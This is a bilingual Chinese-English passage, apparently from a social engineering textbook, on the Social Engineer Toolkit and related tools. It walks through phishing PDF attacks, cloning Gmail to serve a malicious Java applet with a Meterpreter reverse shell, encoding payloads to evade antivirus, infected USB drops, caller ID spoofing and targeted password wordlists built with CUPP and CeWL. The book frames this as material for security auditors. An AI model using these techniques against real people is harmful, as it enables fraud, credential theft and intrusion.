执行此操作后,SET 会询问您是否要将 PDF 的名称更改为更隐蔽的名称,例如TechnicalSupport.pdf ,然后要求您填写发送和接收的电子邮件信息。最后,SET 会发送一封看似专业的电子邮件,试图诱骗用户打开附加的 PDF。图 7-24显示了受害者收到的示例。

After doing so, SET asks you if you want to change the name of the PDF to something more devious like TechnicalSupport.pdf and then asks you to fill in the email information for both sending and receiving. Finally, SET sends out a professional-looking email that will try to trick the user into opening the attached PDF. A sample of what the victim receives is shown in Figure 7-24.

 

图 7-24:一封带有简单附件的无害电子邮件。

Figure 7-24: An innocuous email with a simple attachment.

 
f0724.tif
 

电子邮件发送后,SET 设置监听器并等待目标打开文件。一旦目标点击 PDF,监听器就会做出响应,处理传入的恶意代码并让攻击者访问受害者的计算机。

After the e-mail is sent, SET sets up the listener and waits for the target to open the file. Once the target clicks the PDF, the listener responds by handling the incoming malicious code and giving the attacker access to the victim’s computer.

 

令人惊讶的是(或者可能并不令人惊讶,这取决于您的观点),所有这些操作可能只需点击六七次鼠标即可完成,并且审计人员可以自由地专注于这些攻击的实际社会工程方面。

Surprisingly (or perhaps not, depending on your outlook), all of this was done in maybe six or seven mouse clicks, and it leaves the auditor with the freedom to focus on the actual social engineering aspect of these attacks.

 

这是一种毁灭性的攻击,因为它利用了客户端软件,并且很多时候屏幕上没有任何迹象表明发生了任何不好的事情。

This is a devastating attack because it exploits a client-side piece of software, and many times there is no indication onscreen that anything bad happened.

 

这只是利用 SET 发起的众多攻击之一。

This is just one of the many attacks that can be launched using SET.

 

Web 攻击向量

Web Attack Vector

 

SET 还允许审计员克隆任何网站并将其托管在本地。这种攻击的威力在于,它允许社会工程师以开发人员的身份进行更改,欺骗用户访问该网站,甚至使用在 URL 中添加或删除一个字母的技巧,但将人们引导到克隆的新网站。

SET also allows the auditor to clone any website and host it locally. The power of this type of attack is that it allows the social engineer to trick users into visiting the site under the pretense of being a developer making changes, or even using the trick of adding or deleting one letter in the URL but pointing people to the new site that is cloned.

 

一旦进入克隆网站,就可以发起此类攻击的许多不同部分——信息收集、凭证收集和利用只是其中的一部分。

Once at the cloned website, many different parts of this attack can be launched—information gathering, credential harvesting, and exploiting are just a few.

 

要在 SET 中运行此攻击,您需要从主菜单中选择选项 2,即网站攻击媒介。选择选项 2 后,您将看到几个选项:

To run this attack in SET you would choose option 2, Website Attack Vectors, from the main menu. Upon choosing option 2, you are presented with a few options:

 
 
     
  • 1. Java Applet 攻击方法
  • 1. The Java Applet Attack Method
  •  
     
  • 2. Metasploit 浏览器漏洞利用方法
  • 2. The Metasploit Browser Exploit Method
  •  
     
  • 3. 凭证收集器攻击方法
  • 3. Credential Harvester Attack Method
  •  
     
  • 4. 诱捕攻击方法
  • 4. Tabnabbing Attack Method
  •  
     
  • 5. 中间人攻击法
  • 5. Man Left in the Middle Attack Method
  •  
     
  • 6.返回上一级菜单
  • 6. Return to the previous menu
  •  
 

一种特别邪恶的攻击媒介是选项 1,即 Java Applet 攻击。基本上,Java Applet 攻击会向用户显示 Java 安全警告,指出该网站已由 ABC 公司签名,并要求用户批准该警告。

A particularly evil attack vector is option 1, a Java Applet Attack. Basically, the Java Applet Attack presents the user with a Java security warning saying that the website has been signed by ABC Company and asks the user to approve the warning.

 

要执行此攻击,请选择选项 1,然后选择选项 2,即站点克隆器。

To perform this attack chose option 1, and then option 2, Site Cloner.

 

选择 Site Cloner 后,系统会询问您要克隆哪个网站。在这里,您可以选择任何您想要的网站——客户的网站、他们使用的供应商或政府网站——选择权在您手中。不过,正如您可能想象的那样,选择一个对目标有意义的网站至关重要。

Upon choosing Site Cloner, you will be asked which website you want to clone. Here, you can chose anything you want—the client’s website, a vendor they use, or a government website—the choice is yours. As you might imagine, though, choosing a site that makes sense to the target is essential.

 

在本练习中,假设您克隆了 Gmail。屏幕上将显示以下内容:

In this exercise, imagine you cloned Gmail. You would be presented with the following on the screen:

 

SET 支持 HTTP 和 HTTPS

SET supports both HTTP and HTTPS

 

例如:http://www.thisisafakesite.com

Example: http://www.thisisafakesite.com

 

输入要克隆的网址:http://www.gmail.com

Enter the url to clone: http://www.gmail.com

 

[*] 克隆网站:http://www.gmail.com

[*] Cloning the website: http://www.gmail.com

 

[*] 这可能需要一点时间...

[*] This could take a little bit...

 

[*] 向新克隆的网站注入Java Applet攻击。

[*] Injecting Java Applet attack into the newly cloned website.

 

[*] 文件名混淆完成。有效载荷名称为:DAUPMWIAHh7v.exe

[*] Filename obfuscation complete. Payload name is: DAUPMWIAHh7v.exe

 

[*] 恶意 Java 小程序网站已准备好部署

[*] Malicious java applet website prepped for deployment

 
 

完成此操作后,SET 将询问您希望在您和受害者之间建立哪种类型的连接。要使用本书中讨论的技术,请选择名为 Meterpreter 的 Metasploit 反向 shell。

Once you are done with this, SET will ask you what type of connection you want it to create between you and the victim. To use a technology discussed in this book, choose the Metasploit reverse shell called Meterpreter.

 

SET 为您提供了使用不同编码器对有效载荷进行编码的选项。这可以帮助您避免被防病毒系统发现。

SET gives you the option to encode your payload with different encoders. This is to help you avoid getting caught by antivirus systems.

 

接下来,SET 启动其自己的内置网络服务器,托管网站,并设置监听器来捕获受害者浏览网站的行为。

Next, SET launches its own built-in web server, hosts the site, and sets up a listener to catch your victim browsing the website.

 

现在就看社会工程师是撰写一封电子邮件还是打一个电话来吸引目标访问该 URL 了。最终,用户将看到如图 7-25所示的内容。

Now it is up to the social engineer to either craft an email or a phone call to draw the target to the URL. In the end, the user would see what is shown in Figure 7-25.

 

最终结果是向受害者展示一个 Java Applet,表明该网站已由 Microsoft 签名,并且用户需要允许运行安全认证才能访问该网站。

The end result is the victim is presented with a Java Applet stating the site has been signed by Microsoft and that the user needs to allow the security certification to be run in order to access the site.

 

一旦用户允许安全认证,攻击者就会在计算机中收到提示。

As soon as the user allows the security certification, the attacker is presented with a prompt to their computer.

 

图 7-25:谁不信任来自微软的数字签名的小程序?

Figure 7-25: Who wouldn’t trust a digitally signed applet from Microsoft?

 
f0725.tif
 

SET 的其他功能

Other Features of SET

 

SET 是由社会工程师为社会工程师开发的,因此它为用户提供的工具集基于审计业务所需的常见攻击。

SET was developed by social engineers with social engineers in mind, so the toolset that it gives the user is based around the common attacks needed by those in the auditing business.

 

SET 不断发展壮大。例如,近几个月来,SET 已经能够处理除网站克隆和鱼叉式网络钓鱼之外的其他攻击;它还拥有一个感染性媒体生成器。感染性媒体生成器是用户可以创建 DVD、CD 或 USB 密钥的地方,其中编码了恶意文件,可以将其丢弃或留在目标的办公楼。当将其插入计算机时,它将执行该恶意负载并导致受害者的机器受到攻击。

SET is constantly growing and expanding. In recent months, for instance, SET has become capable of handling other attacks besides website cloning and spear phishing; it also houses an infectious media generator. An infectious media generator is where the user can create a DVD, CD, or USB key encoded with a malicious file that can be dropped or left at the target’s office building. When it is inserted into a computer it will execute that malicious payload and cause the victim’s machine to be compromised.

 

SET 还可以为其创建一个简单的有效载荷和适当的侦听器。如果社会工程师只想拥有一个可反向连接到其服务器的 EXE,他可以将其放在 USB 密钥中以供审计使用。如果他发现自己正站在一台他想要远程访问的机器前,他可以插入 USB 密钥并将有效载荷文件放到计算机上,然后单击它。这将使他能够快速连接到他的机器。

SET can also create a simple payload and proper listener for it. If the social engineer just wants to have an EXE that is a reverse shell that will connect back to his servers, he can carry this in a USB key for use on an audit. If he finds himself in front of a machine to which he wants remote access, he can put in the USB key and drop the payload file on the computer then click it. This will give him a quick connection back to his machines.

 

一种较新的攻击媒介是 Teensy HID 攻击媒介。Teensy 设备是微型可编程电路板,可嵌入键盘、鼠标或其他插入计算机的电子设备中。

A newer attack vector is the Teensy HID attack vector. Teensy devices are tiny programmable circuit boards that can be embedded into things like keyboards, mice, or other electronic devices that get plugged into computers.

 

SET 生成所需的程序来告诉这些微型电路板在插入时要做什么;提供反向 shell 或设置监听端口等命令很常见。

SET produces the programming needed to tell these tiny boards what to do when they are plugged in; commands like giving reverse shells or setting up listening ports are common.

 

SET 的最新功能之一是该工具的 Web 界面。这意味着 Web 服务器将自动启动,以将 SET 托管在网页上,以便于使用。图 7-26显示了此 Web 界面的外观。

One of the newest features of SET is a web interface to the tool. This means that a web server will start automatically to host the SET on a webpage for easier use. Figure 7-26 shows what this web interface looks like.

 

图 7-26:社会工程师工具包的新 Web 界面。

Figure 7-26: The new web interface of the Social Engineer Toolkit.

 
f0726.tif
 

SET 是一款功能强大的工具,旨在帮助社会工程师审计员测试公司中通常存在的弱点。SET 工具开发人员始终乐于接受建议并帮助创建工具的新部分,以继续发展它,使其成为更受欢迎的工具集。同样,如果您想深入了解这个神奇的工具, www.social-engineer.org对每个菜单选项都有完整的解释供您查看。继续查看www.social-engineer.org www.secmaniac.com以获取社会工程师工具包的更新。

SET is a powerful tool made to help a social engineer auditor test the weaknesses that usually exist in a company. The SET tool developer is always open to suggestions and help in creating new parts of the tool to continue growing it to become a more popular toolset. Again, www.social-engineer.org has a full explanation of every menu option for review if you want to delve deeper into this amazing tool. Continue to check both www.social-engineer.org www.secmaniac.com for updates to the Social Engineer Toolkit.

 

基于电话的工具

Telephone-Based Tools

 

对于社会工程师来说,电话是他们最古老的工具之一。如今,有了手机、VoIP 和自制电话服务器,社会工程师利用电话的方式已经大大增多。

One of the oldest tools in the book for social engineers is the telephone. Nowadays, with cell phones, VoIP, and homemade phone servers, the options of how a social engineer can utilize the phone have grown considerably.

 

由于人们被电话营销、推销和广告淹没,社会工程师需要熟练地使用电话进行审计。尽管存在这些限制,但使用电话作为社会工程工具可以在很短的时间内导致公司完全被攻陷。

Because people are inundated with telemarketing calls, sales pitches, and advertisements, a social engineer needs to be skilled to use the phone successfully in an audit. Despite these limitations, using the phone as a social engineering tool can lead to total compromise of a company in a very short period of time.

 

在人人都有手机的时代,人们在公交车、地铁或任何公共场所进行私人和深入的对话,手机可以以多种方式使用。窃听或用手机呼叫目标可以提供过去没有的额外媒介。随着市场上智能手机和类似电脑的手机数量的增加,越来越多的人将密码、个人数据和私人信息存储在手机上。这为社会工程师在许多不同情况下访问目标及其数据提供了可能性

In an era where everyone has a cell phone and people carry on personal and deep conversations on the bus, subway, or in any public place, the phone can be used in many ways. Eavesdropping or calling a target on their cell phone allows for additional vectors that were not available in days past. With the increased numbers of smart phones and computer-like phones on the market more and more people are storing passwords, personal data, and private information on their phones. This opens up the ability for the social engineer to be able to access the target and their data in many different situations

 

此外,如果来电者符合某些“标准”,人们就会更愿意迅速提供信息。例如,如果手机上的来电显示表明该人是从公司总部打来的,许多人会不加核实就提供信息。iPhone 和 Android 智能手机都有应用程序,可用于将您的来电显示号码伪装成您想要的任何号码。像 SpoofApp ( www.spoofapp.com ) 这样的应用程序允许社会工程师拨打看似来自地球上任何地方的电话,每次通话费用相对较低。所有这些都有助于建立您的借口的可信度。

Also, being connected 24/7 makes people more ready to give out information quickly if the caller passes a certain set of “criteria” that makes him believable. For instance, if the caller ID on the cell phone indicates that the person is calling from corporate headquarters, many people would give over information with no verification. Both the iPhone and Android smart phones have applications that can be used to spoof your caller ID number to any number you want. Apps like SpoofApp (www.spoofapp.com) allow the social engineer to make calls that look as if they originate from anywhere on earth for a relatively low cost per call. All of this goes to building credibility of your pretext.

 

使用手机进行社会工程学可以分为两个不同的领域:其背后的技术和言语规划。

Using the phone for social engineering can be broken down into two different arenas: the technology behind it and planning out what you say.

 

来电显示欺骗

Caller ID Spoofing

 

来电显示已成为企业和家庭中常见的技术。尤其是现在手机取代了人们使用的许多陆上电话线,来电显示已成为日常生活的一部分。意识到这一事实并知道如何利用这一点是成功的社交工程师的必备条件。

Caller ID has become a commonplace technology in both business and home use. Especially now with cell phones replacing many of the land-based phone lines people use, caller ID is part of daily life. Being aware of this fact and how to use this to your advantage is a must for a successful social engineer.

 

来电显示欺骗基本上就是改变目标来电显示上显示的信息。换句话说,虽然你用一个号码拨打电话,但目标的来电显示上显示的却是另一个号码。

Caller ID spoofing basically is changing the information that appears on the target’s caller ID display. In other words, though you are placing the call from one number, a different number appears on the target’s caller ID.

 

利用这些信息的一种方法是伪造您在目标使用的供应商的垃圾桶里找到的号码。如果社会工程师发现他们使用 ABC Tech 提供计算机支持,社会工程师可以找到他们的号码,并在拨打电话安排下午的约会时伪造该号码。使用来电显示伪造,您可以从以下位置“发起”呼叫:

One way to leverage this information is to spoof the number you found in a dumpster dive of a vendor used by your target. If the social engineer finds out that they use ABC Tech for computer support, the social engineer can find their number, and spoof that when a call is placed to set up an afternoon appointment. Using caller ID spoofing, you can “originate” calls from the following places:

 
 
     
  • 远程办公室
  • A remote office
  •  
     
  • 办公室内部
  • Inside the office
  •  
     
  • 合作伙伴组织
  • A partner organization
  •  
     
  • 公用事业/服务公司(电话、水务、互联网、灭虫等)
  • A utility/service company (telephone, water, Internet, exterminator, and so on)
  •  
     
  • 上级
  • A superior
  •  
     
  • 一家快递公司
  • A delivery company
  •  
 

那么如何进行欺骗呢?以下部分讨论了社会工程师可以用来欺骗号码的一些方法和设备。

So how do you spoof? The following sections discuss some of the methods and equipment available a social engineer can use to spoof numbers.

 

恶搞卡

SpoofCard

 

最流行的来电显示欺骗方法之一是使用 SpoofCard ( www.spoofcard.com/ )。使用其中一张卡,您可以拨打卡上提供给您的 800 号码,输入您的 PIN、您希望来电显示显示的号码,然后输入您想要拨打的号码。

One of the most popular methods of caller ID spoofing is by using a SpoofCard (www.spoofcard.com/). Using one of these cards, you call up the 800 number given to you on the card, enter your PIN, the number you want the caller ID to display, and then the number you want to call.

 

SpoofCard 的一些新功能可让您录制电话对话并将您的声音伪装成男性或女性。这些功能可最大程度地隐藏来电者,并诱骗目标泄露社交工程师想要的信息。

Some new features of the SpoofCard offer you the ability to record the phone conversation and mask your voice to be male or female. These features maximize the ability to hide who is calling and trick the target into divulging information the social engineer seeks.

 

优点是,SpoofCard 使用简单,除了手机之外不需要任何额外的硬件或软件,并且已为数千名客户提供了可靠的服务。SpoofCard 唯一的缺点是购买成本较高。

On the plus side, SpoofCard is simple to use, it needs no extra hardware or software other than your phone, and it has proven service with thousands of customers. The only real negative to SpoofCard is the cost involved to purchase it.

 

恶搞应用

SpoofApp

 

随着越来越多的人使用 iPhone、Android 或 Blackberry 等智能手机,大量应用程序应运而生,用于协助来电显示欺骗。SpoofApp 使用 SpoofCards(参见上一节),但将功能捆绑到手机的一个包中。

With so many people using smart phones like the iPhone, Android, or the Blackberry there has been an influx of apps created to assist in caller ID spoofing. SpoofApp uses SpoofCards (see the preceding section) but bundles the features into a package on your cell phone.

 

您无需拨打免费电话号码,只需在应用程序中输入要拨打的号码,然后输入要显示的号码,SpoofApp 就会将您连接到目标,并向目标显示您请求的信息。只需单击按钮即可完成所有操作。

Instead of having to call a toll free number you simply enter the number you want to call into the application, then enter the number you want to display, and SpoofApp connects you to the target displaying the information you requested to the target. All of this is as simple as a click of a button.

 

星号

Asterisk

 

如果您有一台闲置的计算机和 VoIP 服务,您还可以使用 Asterisk 服务器来伪造呼叫者 ID。您可以在www.social-engineer.org/wiki/archives/CallerIDspoofing/CallerID-SpoofingWithAsterisk.html上找到有关此方法的一些信息。Asterisk 服务器的工作方式与 SpoofCard 非常相似,但用于伪造 ID 的服务器除外。在这种情况下,您拥有服务器。这很有吸引力,因为它允许更多的自由,并且不必担心被切断或时间耗尽。

If you have a spare computer and a VoIP service you can also use an Asterisk server to spoof caller IDs. You can find some information about this method at www.social-engineer.org/wiki/archives/CallerIDspoofing/CallerID-SpoofingWithAsterisk.html. An Asterisk server is very similar to how SpoofCard works, with the exception of the server used to spoof the ID. In this case, you own the server. This is attractive because it allows for more freedom and there is no fear of being cut off or minutes running out.

 

Asterisk 的优点在于它是免费的,安装后易于使用且灵活,并且您一个人就可以控制它。缺点包括需要额外的计算机或 VM、需要 Linux 知识,并且您需要当前的 VoIP 服务提供商。

The positive aspects of Asterisk are that it is free, it’s easy to use and flexible after setup, and you alone control it. Minuses include that an extra computer or VM is needed, Linux knowledge is required, and you need a current VoIP service provider.

 

此选项的优点在于,有关呼叫者和被呼叫者的所有信息都掌握在社交工程师手中。个人信息和帐户数据不会落入第三方手中。

The great part about this option is that all the information about the caller and the person called resides with the social engineer. Personal and account data are not in the hands of a third party.

 

使用脚本

Using Scripts

 

电话是社会工程师最喜欢的工具。它不仅提供了匿名性,而且可以通过更改借口的细微部分来对众多目标进行练习。

The telephone is a favorite tool of the social engineer. It offers anonymity as well as the ability to practice on numerous targets by changing just slight parts of the pretext.

 

在社会工程中使用电话时,您必须考虑的一个方面是使用脚本。脚本是确保涵盖和触及所有必要元素的重要部分;但是,脚本不应该是逐字逐句的演讲。没有什么比面对一个听起来像在读脚本的人更让目标感到恼火的了。

One aspect of using the phone in social engineering that you must consider is the use of scripts. Scripting can be an essential part in ensuring that all the needed elements are covered and touched on; however, a script should not be a word-for-word speech to be given. Nothing irritates the target more than to be presented with a person who sounds like he is reading a script.

 

写完剧本后,你应该反复练习,这样你听起来才真实、真诚、可信。

After you write a script you should practice it over and over so you sound real, genuine, and believable,

 

这时,您的信息收集会议将变得至关重要。社会工程师收集的信息越多,脚本就越清晰。我发现阅读一些关于目标的爱好和兴趣的事实很有用,这样我就可以用它来建立融洽的关系。

This is where your information-gathering sessions will become vital. The better the information the social engineer gathers the clearer the script will become. I find it useful to read a few facts on the hobbies and interests of the target so I can use that to build rapport.

 

一旦你整理好所有信息,制定一个计划会很有帮助。在前面讨论的案例中——印刷公司的首席执行官——我必须制定一个大纲,以便我能够利用我演讲的关键部分、我想要达到的重点,以及给自己的提示,例如“说清楚”、“不要忘记推动慈善事业”、“放慢速度”等等,这让我在通话过程中保持专注。

Once you have all the information laid out it can be helpful to then outline a plan of attack. In the case discussed previously—the CEO of the printing company—I had to develop an outline that would allow me to utilize the key parts of my pitch, high points I wanted to hit, as well as notes to myself like, “speak clearly,” “don’t forget to push the charity,” “slow down,” and so on, which kept me focused during the call.

 

使用脚本或大纲而不是完整的手稿将使您保持流畅和自然,并在遇到您没有计划的事情时提供创作自由。

Using a script or outline versus a fully written out manuscript will keep you fluid and natural and allow creative freedom when presented with things you didn’t plan for.

 

电话对于社会工程师来说依然是一个致命工具,如果与本书迄今所提到的原则结合使用,它可以引导社会工程师走上成功之路。

The telephone is still a deadly tool for the social engineer and when used with the principles mentioned so far in this book, it can lead a social engineer down the path of success.

 

密码分析器

Password Profilers

 

值得一提的另一组工具可帮助您分析目标及其可能使用的密码。在您收集到有关目标的所有信息后,下一步就是开发一个配置文件。配置文件是您规划出一些您认为可行的攻击媒介的地方,也是您可以开始构建潜在密码列表以尝试暴力攻击的地方。从工具的角度来看,如果您有这个选项,拥有一个可能的密码列表可以帮助加快黑客攻击。本节介绍了几个可用的分析器。

Another set of tools that bear mentioning help you profile targets and the passwords they may use. After you have all the information on a target you can gather, your next is to develop a profile. A profile is where you plan out a few attack vectors you feel will work and also where you can start to build a list of potential passwords to try in brute force attacks. From a tool perspective, having a list of possible passwords can assist in expediting a hack if you are presented with that option. This section covers a couple profilers that are available.

 

密码分析工具可能会减少您需要完成的几个小时甚至几天的工作。

Password profiling tools can take hours or even days off the work that you need to do.

 

尽管已经发出了很多警告,但每年遭受简单攻击的人数仍在增加。在互联网上列出有关自己、家人和生活的各种信息的人数令人震惊。结合根据社交媒体使用情况建立的个人资料、在网络上其他地方找到的信息以及使用随后讨论的工具,社交工程师可以概述一个人的整个生活。

Each year the number of people falling prey to simple attacks increases, despite the many warnings that are issued. The number of people who list all sorts of information about themselves, their families, and their lives on the Internet is amazing. Combining a profile built from their social media usage, what is found elsewhere on the web, and using the tools discussed subsequently, a social engineer can outline a person’s whole life.

 

这种方法之所以如此有效,原因之一是许多人选择密码的方式。事实证明,许多人会反复使用相同的密码。更糟糕的是,许多人选择的密码很容易猜到,即使没有技巧。

One of the reasons this works so well is the way that many people chose their passwords. It has been proven that many people will use the same password over and over again. What is worse is that many people choose passwords that can be easily guessed with little to no skill.

 

最近,互联网安全公司 BitDefender 进行了一项研究,证实了这一事实。BitDefender 分析了超过 25 万用户的密码使用情况。结果令人震惊:在这 25 万用户中,75% 的人在电子邮件和所有社交媒体账户上使用相同的密码。考虑到最近 1.71 亿 Facebook 用户的个人信息被泄露,这一情况应该尤其令人担忧。完整故事可在www.securityweek.com/study-reveals-75-percent-individuals-use-same-password-social-networking-and-email上找到。

Recently, BitDefender, an Internet security firm, performed a study that proved this fact. BitDefender analyzed the password usage of more than 250,000 users. The results were amazing: 75% of the 250,000 used the same passwords for email as well as all social media accounts. This should be especially scary considering the recent story of how 171 million Facebook users had their personal information released on a torrent. The full story can be found at www.securityweek.com/study-reveals-75-percent-individuals-use-same-password-social-networking-and-email.

 

2009 年,一个绰号为 Tonu 的黑客进行了一项非常有趣的研究。他毫无恶意地获取了一个最近被删除的热门社交媒体网站的 URL。他伪造了该页面,然后在短时间内记录了人们试图登录的次数。

In 2009 a hacker by the nickname of Tonu performed a very interesting bit of research. With no malicious intent he obtained a recently dropped URL of a popular social media site. He spoofed the page, then for a brief period of time logged the attempts of people trying to log in.

 

您可以在www.social-engineer.org/wiki/archives/BlogPosts/MenAndWomenPasswords.html查看结果。

You can view the results at www.social-engineer.org/wiki/archives/BlogPosts/MenAndWomenPasswords.html.

 

其中一些数据甚至会让最有经验的安全专家感到震惊。在 734,000 人中,有 30,000 人使用名字作为密码,近 14,500 人使用姓氏。尽管这些数字令人震惊,但接下来发现的结果更令人震惊——下表列出了最常用的八个密码。

Some of this data will shock even the most seasoned security professionals. Out of 734,000 people, 30,000 used their first name as a password and almost 14,500 used their last name. Although those numbers are shocking what was found next was mind blowing—the top eight most commonly used passwords are outlined in the following table.

 
密码 性别 用户数
123456 17601
密码 4545
12345 3480
1234 2911
123 2492
123456789 2225
123456 F 1885
键盘 1883
 

17,601名男性使用了密码123456?令人震惊的统计数据。

17,601 males used the password 123456? Staggering statistics.

 

如果这还不够令人震惊,Tonu 发布的统计数据显示,该列表中超过 66% 的用户使用的密码长度为 6 到 8 个字符。鉴于大多数人的密码都很简单,使用流行的密码破解工具(如图7-27所示的 Cain 和 Abel )破解简单密码对于社会工程师来说并非不合理。

If this isn’t shocking enough, Tonu posted statistics that more than 66% of the users on that list used passwords that were six to eight characters long. With the information that most people have simple passwords, using a popular password-cracking tool, like Cain and Abel shown in Figure 7-27, to crack a simple password is not unreasonable for a social engineer to do.

 

您会注意到“剩余时间”框显示 3.03909 天。对于大多数黑客来说,等待获得服务器访问权限的三天时间很短。等待管理员密码的三天时间真的那么长吗?

You will notice that the Time Left box says 3.03909 days. To most hackers, three days is a short time to wait to be given clear access to the servers. Is three days really that long to wait for the administrator password?

 

为了使这些信息真正深入人心,请看图 7-28,它显示了如果同一个用户使用包含大写和小写以及非字母数字字符的 14-16 个字符的密码时产生的差异。

To make this information really hit home, look at Figure 7-28, which shows the difference made if the same user were to use a 14–16 character password containing upper and lower case as well as non-alphanumeric characters.

 

图7-27:仅需三天时间即可破解一个简单的密码。

Figure 7-27: Only three days to crack a simple password.

 
f0727.tif
 

图7-28:剩余时间框已增加至数万亿年。

Figure 7-28: The Time Left box has increased to trillions of years.

 
f0728.tif
 

等待 5 万亿年以上是不是有点太久了?只要将字符数增加到 14 个,并使用一些非基本字符(即 *、&、$、% 和 ^),黑客通过暴力破解获取密码的可能性就几乎为零。

Does more than 5 trillion years seem a little long to wait? By just increasing the characters to 14 and using some non-basic characters (that is, *, &, $, %, and ^) the odds of a hacker obtaining the password through brute force become next to impossible.

 

由于许多用户不会使用这种复杂程度的密码,因此识别许多用户密码的弱点并不困难。某些工具(下一节将介绍其中的几种)有助于分析用户可能选择的潜在密码。

Because many users don’t use this level of complexity, identifying the weakness in many users’ passwords is not difficult. Certain tools (a couple of which are described in the next section) help profile potential passwords a user may have chosen.

 

通用用户密码分析器 (CUPP)

Common User Password Profiler (CUPP)

 

对个人进行分析是成功进行社会工程审计的主要方面之一。如前所述,Tonu 的研究显示,在 734,000 人中,超过 228,000 人的密码只使用了六个字符。其中超过 17,000 人选择使用“123456”作为密码,近 4,600 人选择使用单词“password”作为密码。

Profiling a person is one of the main aspects of a successful social engineering audit. As previously discussed, Tonu’s research shows that out of 734,000 people, more than 228,000 of them used only six characters in their passwords. More than 17,000 of those chose to use the password of “123456” and close to 4,600 chose the word “password” as their password.

 

通用用户密码分析器 (CUPP) 是一种使密码分析变得简单的工具。

Common User Password Profiler (CUPP) is a tool that was created to make password profiling an easy task.

 

Murgis Kurgan(又名 j0rgan)创造了这个神奇的小工具。它以脚本的形式在领先的渗透测试发行版 BackTrack 中运行,或者您可以从www.social-engineer.org/cupps.tar.gz下载。

Murgis Kurgan, also known as j0rgan, created this amazing little tool. It runs as a script in the leading penetration testing distribution, BackTrack, or you can download it from www.social-engineer.org/cupps.tar.gz.

 

最常见的身份验证形式是用户名和密码或密码短语的组合。如果两者与本地存储表中存储的值相匹配,则用户通过连接身份验证。密码强度是衡量通过加密技术或基于库的替代值自动测试猜测或破解密码的难度的指标。

The most common form of authentication is the combination of a username and a password or passphrase. If both match values stored within a locally stored table, the user is authenticated for a connection. Password strength is a measure of the difficulty involved in guessing or breaking the password through cryptographic techniques or library-based automated testing of alternate values.

 

弱密码可能非常短或仅使用字母数字字符,使解密变得简单。弱密码也可能是那些了解用户资料的人很容易猜到的密码,例如生日、昵称、地址、宠物或亲戚的名字,或者上帝、爱、金钱或密码等常用词。

A weak password might be very short or only use alphanumeric characters, making decryption simple. A weak password can also be one that is easily guessed by someone profiling the user, such as a birthday, nickname, address, name of a pet or relative, or a common word such as God, love, money, or password.

 

由于大多数用户的密码都比较弱,很容易被猜到,因此 CUPP 是进行分析的完美工具。它可用于法律渗透测试或法医犯罪调查。

Because most users have weak passwords that can be easy to guess, CUPP is a perfect tool for profiling. It can be used for legal penetration tests or forensic crime investigations.

 

下面是从 BackTrack 4 中使用 CUPP 的会话中复制/粘贴的内容:

The following is a copy/paste from a session using CUPP in BackTrack 4:

 

root@bt4:/pentest/passwords/cupp# ./cupp.py -i

root@bt4:/pentest/passwords/cupp# ./cupp.py -i

 

[+] 插入受害者的信息来制作字典[低案例!]

[+] Insert the information about the victim to make a dictionary [low cases!]

 

[+] 如果您不知道所有信息,只需在询问时按回车键!;)

[+] If you don’t know all the info, just hit enter when asked! ;)

 

> 姓名:约翰

> Name: John

 

> 姓氏:史密斯

> Surname: Smith

 

> 昵称:约翰尼

> Nickname: Johnny

 

> 出生日期(DDMMYYYY;例如 04111985):03031965

> Birthdate (DDMMYYYY; i.e. 04111985): 03031965

 

> 妻子(丈夫)的名字:Sally

> Wife’s(husband’s) name: Sally

 

> 妻子(丈夫)的昵称:Sals

> Wife’s(husband’s) nickname: Sals

 

> 妻子(丈夫)的出生日期(DDMMYYYY;例如 04111985):05011966

> Wife’s(husband’s) birthdate (DDMMYYYY; i.e. 04111985): 05011966

 

> 孩子的名字:罗杰

> Child’s name: Roger

 

> 孩子的昵称:Roggie

> Child’s nickname: Roggie

 

> 孩子的出生日期(DDMMYYYY;例如 04111985):05042004

> Child’s birthdate (DDMMYYYY; i.e. 04111985): 05042004

 

> 宠物的名字:Max

> Pet’s name: Max

 

> 公司名称:ABC 纸业

> Company name: ABC Paper

 

> 您是否想添加一些关于受害者的关键词?Y/[N]:Y

> Do you want to add some key words about the victim? Y/[N]: Y

 

> 请输入单词,以逗号分隔。[例如 hacker、juice、black]:christian、polish、sales person

> Please enter the words, separated by comma. [i.e. hacker, juice, black]: christian,polish,sales person

 

> 是否要在单词末尾添加特殊字符?Y/[N]:N

> Do you want to add special chars at the end of words? Y/[N]: N

 

> 是否要在单词末尾添加一些随机数字?Y/[N]n

> Do you want to add some random numbers at the end of words? Y/[N]n

 

> Leet 模式?(即 leet = 1337)Y/[N]:Y

> Leet mode? (i.e. leet = 1337) Y/[N]: Y

 

[+] 现在正在制作字典...

[+] Now making a dictionary...

 

[+] 对列表进行排序并删除重复项...

[+] Sorting list and removing duplicates...

 

[+] 保存词典为John.txt,共计13672个单词。

[+] Saving dictionary to John.txt, counting 13672 words.

 

[+] 现在将 John.txt 装入你的 pistolero 并射击!祝你好运!

[+] Now load your pistolero with John.txt and shoot! Good luck!

 
 

最后请注意,使用提供的信息创建了一个包含 13,672 个密码的字典文件。这种工具的强大之处在于它可以消除社会工程学中密码猜测方面的大量猜测。

Notice at the end that a dictionary file of 13,672 passwords using the information provided was created. The power of this type of tool is that it can take a lot of the guesswork out of the password-guessing aspect of social engineering.

 

中央

CeWL

 

根据其作者的描述,CeWL 是一个 Ruby 应用程序,它可以将给定的 URL 爬取到指定的深度,可以选择跟踪外部链接,并返回一个单词列表,然后这些单词可用于 John the Ripper 等密码破解程序。有关 CeWL 的更多信息,请访问其网站www.digininja.org/projects/cewl.php。查看在 BackTrack4 中使用 CeWL 的会话:

As described by its authors, CeWL is a Ruby application that spiders a given URL to a specified depth, optionally following external links, and returns a list of words that can then be used for password crackers such as John the Ripper. For more information about CeWL see their website at www.digininja.org/projects/cewl.php. Take a look at a session using CeWL in BackTrack4:

 

root@bt:/pentest/passwords/cewl# ruby​​ cewl.rb

root@bt:/pentest/passwords/cewl# ruby cewl.rb

 

--help cewl 3.0 Robin Wood (dninja@gmail.com)

--help cewl 3.0 Robin Wood (dninja@gmail.com)

 

(www.digininja.org)

(www.digininja.org)

 

用法:cewl [选项] ... URL --help,-h:显示帮助 --depth x,-dx:蜘蛛深度,

Usage: cewl [OPTION] ... URL --help, -h: show help --depth x, -d x: depth to spider to,

 

默认 2 --min_word_length, -m:最小字长,默认 3 --offsite, -o:让

default 2 --min_word_length, -m: minimum word length, default 3 --offsite, -o: let the

 

spider 访问其他网站 --write, -w file: 将输出写入文件 --ua, -u user-

spider visit other sites --write, -w file: write the output to the file --ua, -u user-

 

